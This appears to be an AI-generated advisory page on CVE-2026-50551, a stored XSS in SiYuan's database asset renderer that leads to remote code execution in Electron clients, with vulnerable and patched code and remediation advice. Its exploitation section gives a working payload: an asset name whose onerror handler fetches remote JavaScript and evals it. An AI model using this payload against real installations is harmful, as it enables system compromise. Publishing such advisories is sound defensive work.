CVEReports
CVEReports

Automated vulnerability intelligence platform. Comprehensive reports for high-severity CVEs generated by AI.

Product

  • Home
  • Sitemap
  • RSS Feed

Company

  • About
  • Contact
  • Privacy Policy
  • Terms of Service

© 2026 CVEReports. All rights reserved.

Made with love by Amit Schendel & Alon Barad



CVE-2026-50551

CVE-2026-50551: Stored Cross-Site Scripting to Remote Code Execution via Attribute View Asset Cell Renderer in SiYuan

Amit Schendel
Amit Schendel
Senior Security Researcher

Jul 10, 2026·6 min read·5 visits

Executive Summary (TL;DR)

Stored XSS in SiYuan's database asset renderer allows unauthenticated remote code execution via synchronizing a maliciously crafted database in Electron clients.

A critical-severity stored Cross-Site Scripting (XSS) vulnerability exists in SiYuan's Attribute View database asset cell renderer. This flaw allows low-privilege authenticated users to execute arbitrary JavaScript in the application frontend. In Electron-based desktop clients, this execution context can be leveraged to execute arbitrary native operating system commands, resulting in complete system compromise.

Vulnerability Overview

SiYuan is an open-source personal knowledge management system designed with a focus on privacy and local-first data storage. A central feature of the platform is the Attribute View, which functions as a structured database allowing users to organize notes, documents, and various fields. This interface acts as a significant attack surface because it processes complex user-defined schemas and external inputs.

The vulnerability, identified as CVE-2026-50551, lies in the asset cell renderer component of this database feature. This specific module is responsible for rendering file attachments and visual links to uploaded assets within the user interface. Due to inadequate processing of these asset attributes, an authenticated user can inject malicious scripts into the application context.

The resulting flaw is classified under CWE-79 as a Stored Cross-Site Scripting vulnerability. While typical XSS exploits are limited to the browser sandbox, the desktop client's architecture relies on Electron. Consequently, the execution of arbitrary script code within the web context can bypass security boundaries and achieve full Remote Code Execution on the client operating system.

Root Cause Analysis

The primary technical defect resides in the improper neutralization of input before it is rendered inside the Document Object Model. When a user uploads a file or creates an asset link, the application assigns structural properties, including the filename, to the database entry. The application handles these properties as trusted data points during subsequent visual renderings.

During the rendering of an Attribute View database table, the asset cell renderer fetches the metadata string associated with each asset. Instead of applying strict sanitization or using safe text-binding APIs, the renderer constructs HTML blocks dynamically. This allows any HTML tags or JavaScript handlers contained within the asset name to be executed directly in the user session.

The vulnerability is highly operationalizable because the data synchronization engine propagates these database configurations. If a shared or compromised database is synchronized across multiple devices, the malicious asset cell renders automatically on each target system. There is no requirement for user interaction beyond the simple action of viewing the compromised table.

The translation from XSS to RCE is facilitated by the Electron desktop environment. Because the web application runs inside a native desktop wrapper, it has access to specific APIs exposed via the preload script. If the context bridge exposes powerful functions or raw Inter-Process Communication channels, a script executing in the web view can invoke operating system commands.

Code-Level Vulnerability & Patch Analysis

Analysis of the vulnerable code path reveals that the application dynamically constructed cell elements by concatenating strings containing asset names directly into container elements. This pattern exposes the application directly to HTML injection attacks.

// Conceptual representation of the vulnerable rendering path
function renderAssetCell(cellData, container) {
  const assetName = cellData.name; // Attacker-controlled
  const assetPath = cellData.path;
  
  // Unsanitized concatenation leading to CWE-79
  const htmlContent = `<div class="protyle-attr--asset">` +
                      `<a href="${assetPath}" title="${assetName}">` +
                      `<img src="/assets/icon.png" /> ${assetName}` +
                      `</a></div>`;
  
  container.innerHTML = htmlContent;
}

To resolve this vulnerability, the fix implemented in commit 27e0051e0d067892e833df1063cb2fb469600e98 introduces strict sanitization before rendering elements. Rather than directly assigning unvalidated strings to HTML attributes, the application now sanitizes the string using safe parsing functions or builds elements programmatically via the standard DOM API.

// Conceptual representation of the patched rendering path
function renderAssetCellPatched(cellData, container) {
  const assetName = cellData.name;
  const assetPath = cellData.path;
  
  // Clear the container first
  container.innerHTML = '';
  
  const wrapper = document.createElement('div');
  wrapper.className = 'protyle-attr--asset';
  
  const link = document.createElement('a');
  // Safe assignment of attributes prevents payload execution
  link.setAttribute('href', encodeURI(assetPath));
  link.setAttribute('title', assetName);
  
  const img = document.createElement('img');
  img.setAttribute('src', '/assets/icon.png');
  
  const textNode = document.createTextNode(` ${assetName}`);
  
  link.appendChild(img);
  link.appendChild(textNode);
  wrapper.appendChild(link);
  container.appendChild(wrapper);
}

This remediation structurally eliminates the XSS threat vector. By utilizing document.createElement, setAttribute, and document.createTextNode, the browser parser treats all injected values strictly as data rather than executable markup.

Exploitation & Attack Lifecycle

Exploitation of CVE-2026-50551 requires low-privilege access to modify or sync a database within the SiYuan workspace. An attacker begins by crafting a malicious asset or renaming an existing one to include active script tags. The payload is designed to trigger when rendered within an anchor or image source error context.

Malicious Asset Name: "><img src=x onerror="fetch('http://127.0.0.1:8000/payload.js').then(r=>r.text()).then(eval)">

Once the database configuration synchronizes to the target client, viewing the specific table page invokes the renderer. The cell parses the filename literal and injects the broken HTML tag, causing the onerror attribute to execute immediately in the victim's application context.

The script then utilizes the exposed Electron interface to escalate privileges. Because the frontend context can send messages over the IPC channel, the script calls exposed functions that wrapper node operations or system execution commands. This bypasses the typical web sandbox, leading to arbitrary binary execution.

Impact and Severity Assessment

The vulnerability is rated as Critical with a CVSS v3.1 score of 9.9. The high severity reflects the ease of exploitation once an attacker has permission to upload files, combined with the lack of required interaction from other workspace users.

The most significant element of the CVSS vector is the Scope Change (S:C). In standard web applications, XSS compromises only the origin data. In Electron-based applications, a compromise of the renderer context often allows the attacker to interact with backend operating system APIs, breaking the application's logical boundaries.

Successful execution grants the attacker the exact permissions of the running OS user. This allows full access to local files, system configurations, and network environments. It also creates opportunities for persistent backdoors or lateral movement across enterprise networks.

Remediation & Hardening Strategies

The primary remediation step is to upgrade all SiYuan server and client installations to version 3.7.0 or higher. This release contains the formal patch that replaces dynamic string-based HTML insertion with safe DOM node creation APIs.

For self-hosted deployments where upgrading cannot be performed immediately, access controls must be hardened. Administrators should restrict database creation and edit permissions to trusted users. Disabling automatic synchronization with untrusted or public workspaces reduces the distribution vector of the stored database configuration.

Long-term hardening for Electron-based clients should include strict verification of Context Isolation. Preload scripts should only expose highly restricted, input-validated API wrappers to the renderer process. All IPC messages received by the main process must undergo schema validation and authorization checks to prevent unauthorized command execution.

Fix Analysis (1)

Technical Appendix

CVSS Score
9.9/ 10
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
EPSS Probability
0.44%
Top 65% most exploited

Affected Systems

SiYuan (Desktop App & Self-hosted Server)

Affected Versions Detail

Product
Affected Versions
Fixed Version
siyuan
siyuan-note
< 3.7.03.7.0
AttributeDetail
CWE IDCWE-79
Attack VectorNetwork (AV:N)
CVSS Score9.9 (Critical)
ImpactRemote Code Execution (RCE)
Exploit StatusProof of Concept (PoC) documented
KEV StatusNot listed

MITRE ATT&CK Mapping

T1189Drive-by Compromise
Initial Access
T1185Browser Session Hijacking
Collection
CWE-79
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

The product does not sanitize or incorrectly sanitizes user-controlled input before including it in generated web pages, allowing attackers to execute arbitrary script code.

References & Sources

  • [1]GitHub Security Advisory GHSA-56mp-4f3v-fgj2
  • [2]NVD Vulnerability Detail
  • [3]CVE Authority Record
  • [4]Fix Merge Commit

Attack Flow Diagram

Press enter or space to select a node. You can then use the arrow keys to move the node around. Press delete to remove it and escape to cancel.
Press enter or space to select an edge. You can then press delete to remove it or escape to cancel.

More Reports

•9 minutes ago•GHSA-G5R6-GV6M-F5JV
7.7

GHSA-G5R6-GV6M-F5JV: Arbitrary File Read and Exfiltration in mcp-atlassian via Missing Path Validation

A directory traversal vulnerability exists in the mcp-atlassian integration server prior to version 0.22.0. The confluence_upload_attachment tool fails to restrict the paths of uploaded files, allowing authenticated users or external prompt injection payloads to retrieve and exfiltrate arbitrary files from the server's filesystem into Confluence.

Amit Schendel
Amit Schendel
0 views•7 min read
•39 minutes ago•CVE-2026-54158
9.9

CVE-2026-54158: Stored Cross-Site Scripting to Host Remote Code Execution in SiYuan

A critical-severity Stored Cross-Site Scripting (XSS) vulnerability exists in the SiYuan personal knowledge management system. Due to missing sanitization in the attribute-view cell renderer and an insecure Electron default configuration (nodeIntegration: true), attackers can execute arbitrary commands on the victim's host operating system through synchronized workspaces.

Alon Barad
Alon Barad
3 views•5 min read
•about 2 hours ago•GHSA-H4G2-XFMW-Q2C9
8.7

GHSA-H4G2-XFMW-Q2C9: Missing Authentication Bypass in Clauster Configuration Validator

Clauster versions up to and including v0.2.1 suffer from an authentication bypass vulnerability. This issue occurs when Clauster is configured with an authentication method but the master auth.enabled key is omitted or set to false, allowing unauthenticated network access to administrative endpoints and arbitrary code execution through managed Claude Code bridges.

Amit Schendel
Amit Schendel
4 views•5 min read
•about 3 hours ago•GHSA-G936-7JQJ-MWV8
8.3

GHSA-g936-7jqj-mwv8: Administrative Token Leakage and Privilege Escalation in TSDProxy

An authentication bypass and token leakage vulnerability exists in TSDProxy before version 1.4.4. The application unconditionally forwards its internal administrative token to all proxied backend services when identity headers are enabled. Attackers with control over an upstream backend can capture this token and replay it to the local management API to achieve full administrative control over the proxy engine.

Alon Barad
Alon Barad
6 views•7 min read
•about 5 hours ago•CVE-2026-54070
7.1

CVE-2026-54070: Stored Cross-Site Scripting via Modern HTML5 Event Handler Bypass in SiYuan Bazaar

A high-severity Stored Cross-Site Scripting (XSS) vulnerability exists in SiYuan prior to version 3.7.0. The vulnerability is located within the server-side Markdown-to-HTML parsing component for the Bazaar marketplace packages. Due to an incomplete event-handler attribute blocklist in the lute parsing engine and a lack of client-side DOM sanitization, malicious package authors can bypass restrictions using modern HTML5 event handlers. When an authenticated administrator views a malicious package, the embedded JavaScript runs in the administrator origin, allowing unauthorized workspace access, local file reading, and remote API execution.

Alon Barad
Alon Barad
5 views•5 min read
•about 6 hours ago•GHSA-489G-7RXV-6C8Q
8.2

CVE-2026-27826: DNS Rebinding TOCTOU Bypass in mcp-atlassian Server

A DNS-rebinding Time-of-Check to Time-of-Use (TOCTOU) vulnerability exists in the mcp-atlassian server before version 0.17.0. The server processes unauthenticated client-supplied URLs via custom headers, validating the destination IP but failing to pin the resolved address before connecting. This allows remote adjacent-network attackers to achieve Server-Side Request Forgery (SSRF) and access restricted resources or cloud metadata services.

Amit Schendel
Amit Schendel
4 views•5 min read